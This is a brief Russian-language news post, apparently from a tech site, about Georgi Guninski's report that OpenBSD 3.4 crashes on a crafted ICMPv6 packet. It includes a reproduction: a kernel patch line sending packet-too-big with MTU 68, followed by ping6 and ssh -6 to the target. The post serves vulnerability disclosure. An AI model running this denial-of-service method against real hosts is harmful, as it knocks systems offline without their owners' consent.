Знаменитый Georgi
Guninski
докладывает про еще одну найденную
уязвимость. Openbsd 3.4 падает при получении
определенного ICMPv6 пакета. Для этого сначала
надо послать IPv6 пакет с малым MTU, а затем
добить ОС попыткой установки соединения.

Воспроизвести говорят так:

Исправить linux kernel 2.4.24 net/ipv6/icmp.c :

case ICMPV6_ECHO_REPLY:
/* we coulnd't care less */
icmpv6_send(skb, ICMPV6_PKT_TOOBIG, 0, 68, skb->dev); //joro

Затем

ping6 openbsd
ssh -6 openbsd

Подписаться
Уведомить о
0 комментариев
Межтекстовые Отзывы
Посмотреть все комментарии